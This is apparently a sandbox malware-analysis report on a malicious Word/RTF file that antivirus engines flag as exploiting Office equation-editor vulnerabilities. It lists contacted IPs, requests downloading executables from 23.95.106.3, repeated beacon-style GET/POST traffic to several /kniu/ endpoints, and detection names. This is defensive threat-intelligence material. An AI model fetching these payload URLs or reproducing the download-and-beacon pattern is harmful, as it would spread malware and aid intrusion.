Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 11, 2023, 3:42 p.m. | Oct. 11, 2023, 3:46 p.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\OI0ioioOI0I0I0oioioi0oiOI0oi0000%23%23%23%23%23%23%23%23%23%23%23%23%23%2300i0iOI0OI0Ioi0IO0i00I0I0I000%23%23%23%23%23%23%23%23%23%23%23%23%23%23000.doc
912
IP Address | Status | Action |
---|---|---|
103.71.154.243 | Active | Moloch |
104.21.13.143 | Active | Moloch |
164.124.101.2 | Active | Moloch |
199.59.243.225 | Active | Moloch |
216.239.38.21 | Active | Moloch |
216.240.130.67 | Active | Moloch |
23.104.137.185 | Active | Moloch |
23.95.106.3 | Active | Moloch |
45.33.6.223 | Active | Moloch |
67.223.117.37 | Active | Moloch |
85.128.134.237 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://23.95.106.3/350/sihost.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://23.95.106.3/350/122/Ekcflzifpij.mp3 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://23.95.106.3/350/122/process.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.prosourcegraniteinc.com/kniu/?-3E-P=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&buPns=-YhUz8pH8JO | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.theartboxslidell.com/kniu/?-3E-P=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&buPns=-YhUz8pH8JO | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.xxkxcfkujyeft.xyz/kniu/?-3E-P=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&buPns=-YhUz8pH8JO | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.onlyleona.com/kniu/?-3E-P=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&buPns=-YhUz8pH8JO | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.tsygy.com/kniu/?-3E-P=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&buPns=-YhUz8pH8JO | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.poultry-symposium.com/kniu/?-3E-P=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&buPns=-YhUz8pH8JO | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.frefire.top/kniu/?-3E-P=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&buPns=-YhUz8pH8JO |
request | GET http://23.95.106.3/350/sihost.exe |
request | GET http://23.95.106.3/350/122/Ekcflzifpij.mp3 |
request | GET http://23.95.106.3/350/122/process.exe |
request | POST http://www.prosourcegraniteinc.com/kniu/ |
request | GET http://www.prosourcegraniteinc.com/kniu/?-3E-P=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&buPns=-YhUz8pH8JO |
request | GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip |
request | POST http://www.theartboxslidell.com/kniu/ |
request | GET http://www.theartboxslidell.com/kniu/?-3E-P=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&buPns=-YhUz8pH8JO |
request | POST http://www.xxkxcfkujyeft.xyz/kniu/ |
request | GET http://www.xxkxcfkujyeft.xyz/kniu/?-3E-P=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&buPns=-YhUz8pH8JO |
request | POST http://www.onlyleona.com/kniu/ |
request | GET http://www.onlyleona.com/kniu/?-3E-P=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&buPns=-YhUz8pH8JO |
request | POST http://www.tsygy.com/kniu/ |
request | GET http://www.tsygy.com/kniu/?-3E-P=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&buPns=-YhUz8pH8JO |
request | POST http://www.poultry-symposium.com/kniu/ |
request | GET http://www.poultry-symposium.com/kniu/?-3E-P=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&buPns=-YhUz8pH8JO |
request | POST http://www.frefire.top/kniu/ |
request | GET http://www.frefire.top/kniu/?-3E-P=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&buPns=-YhUz8pH8JO |
request | POST http://www.prosourcegraniteinc.com/kniu/ |
request | POST http://www.theartboxslidell.com/kniu/ |
request | POST http://www.xxkxcfkujyeft.xyz/kniu/ |
request | POST http://www.onlyleona.com/kniu/ |
request | POST http://www.tsygy.com/kniu/ |
request | POST http://www.poultry-symposium.com/kniu/ |
request | POST http://www.frefire.top/kniu/ |
file | C:\Users\test22\AppData\Local\Temp\~$0ioioOI0I0I0oioioi0oiOI0oi0000##############00i0iOI0OI0Ioi0IO0i00I0I0I000##############000.doc |
host | 23.95.106.3 |
Lionic | Trojan.MSOffice.CVE-2018-0802.4!c |
DrWeb | Exploit.CVE-2018-0798.4 |
CAT-QuickHeal | Exp.RTF.Obfus.Gen |
Skyhigh | BehavesLike.BadFile.mx |
McAfee | RTFObfustream.c!2A932891E369 |
Sangfor | Malware.Generic-RTF.Save.4aa2c45b |
Arcabit | Exploit.RTF-ObfsObjDat.Gen |
Symantec | Exp.CVE-2017-11882!g6 |
ESET-NOD32 | multiple detections |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Exploit.MSOffice.CVE-2018-0802.gen |
BitDefender | Exploit.RTF-ObfsObjDat.Gen |
NANO-Antivirus | Exploit.Rtf.Heuristic-rtf.dinbqn |
MicroWorld-eScan | Exploit.RTF-ObfsObjDat.Gen |
Tencent | Office.Exploit.Cve-2018-0802.Anhl |
Emsisoft | Exploit.RTF-ObfsObjDat.Gen (B) |
F-Secure | Heuristic.HEUR/Rtf.Malformed |
VIPRE | Exploit.RTF-ObfsObjDat.Gen |
TrendMicro | Trojan.W97M.CVE201711882.SMN |
FireEye | Exploit.RTF-ObfsObjDat.Gen |
Ikarus | Exploit.RTF.Doc |
Detected | |
Avira | HEUR/Rtf.Malformed |
Microsoft | Exploit:Win32/CVE-2017-11882!ml |
ZoneAlarm | HEUR:Exploit.MSOffice.CVE-2018-0802.gen |
GData | Exploit.RTF-ObfsObjDat.Gen |
Varist | RTF/ABRisk.RVKH-2 |
AhnLab-V3 | RTF/Malform-A.Gen |
ALYac | Exploit.RTF-ObfsObjDat.Gen |
Zoner | Probably Heur.RTFBadHeader |
Rising | Exploit.CVE-2017-11882!1.E8F8 (CLASSIC) |
MAX | malware (ai score=84) |
Fortinet | MSOffice/CVE_2018_0798.BOR!exploit |